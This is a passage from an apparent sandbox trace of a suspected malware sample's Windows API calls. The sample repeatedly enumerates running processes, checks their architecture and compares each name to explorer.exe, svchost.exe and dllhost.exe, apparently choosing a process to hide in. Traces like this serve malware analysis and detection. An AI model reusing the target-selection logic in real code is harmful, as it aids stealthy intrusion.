th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0182.463] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0182.463] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.463] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.463] CloseHandle (hObject=0xec) returned 1 [0182.463] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0182.464] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0182.464] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.464] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.464] CloseHandle (hObject=0xec) returned 1 [0182.464] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0182.464] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0182.465] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.465] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.465] CloseHandle (hObject=0xec) returned 1 [0182.465] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.465] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0182.466] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.466] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.466] CloseHandle (hObject=0xec) returned 1 [0182.466] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0182.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0182.466] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.467] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0182.467] CloseHandle (hObject=0xec) returned 1 [0182.467] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0182.467] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0182.467] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0182.467] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0182.467] CloseHandle (hObject=0xe8) returned 1 [0182.467] Sleep (dwMilliseconds=0x3e8) [0183.480] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0183.482] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0183.482] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0183.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0183.483] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0183.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0183.483] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0183.484] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0183.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0183.484] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0183.485] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0183.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0183.485] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0183.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0183.486] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0183.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0183.486] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0183.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0183.487] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0183.487] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0183.488] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0183.488] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0183.489] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0183.489] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0183.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0183.490] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0183.490] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0183.491] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0183.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0183.491] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.491] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.491] CloseHandle (hObject=0xec) returned 1 [0183.491] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0183.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0183.492] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0183.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0183.492] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.492] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.492] CloseHandle (hObject=0xec) returned 1 [0183.492] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0183.493] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0183.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0183.493] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0183.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0183.494] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.494] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.494] CloseHandle (hObject=0xec) returned 1 [0183.494] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0183.494] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0183.494] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0183.494] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0183.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0183.494] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.494] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.495] CloseHandle (hObject=0xec) returned 1 [0183.495] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0183.495] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0183.495] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0183.495] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0183.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0183.495] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.495] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.495] CloseHandle (hObject=0xec) returned 1 [0183.495] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0183.495] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0183.495] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0183.495] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0183.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0183.496] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.496] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.496] CloseHandle (hObject=0xec) returned 1 [0183.496] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0183.496] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0183.496] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0183.496] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0183.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0183.497] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.497] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.497] CloseHandle (hObject=0xec) returned 1 [0183.497] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0183.497] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0183.497] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0183.497] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0183.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0183.497] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.497] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.497] CloseHandle (hObject=0xec) returned 1 [0183.497] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0183.497] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0183.497] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0183.497] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0183.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0183.498] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.498] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.498] CloseHandle (hObject=0xec) returned 1 [0183.498] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0183.498] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0183.498] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0183.498] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0183.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0183.499] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.499] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.499] CloseHandle (hObject=0xec) returned 1 [0183.499] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0183.499] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0183.499] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0183.499] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0183.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0183.499] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.499] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.499] CloseHandle (hObject=0xec) returned 1 [0183.499] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0183.499] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0183.499] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0183.499] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0183.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0183.500] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.500] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.500] CloseHandle (hObject=0xec) returned 1 [0183.500] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0183.500] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0183.500] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0183.500] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0183.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0183.501] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.501] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.501] CloseHandle (hObject=0xec) returned 1 [0183.501] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0183.501] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0183.501] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0183.501] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0183.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0183.501] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.501] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.501] CloseHandle (hObject=0xec) returned 1 [0183.501] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0183.501] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0183.501] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0183.501] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0183.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0183.502] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0183.502] IsWow64Process (in: hProcess=0xec, 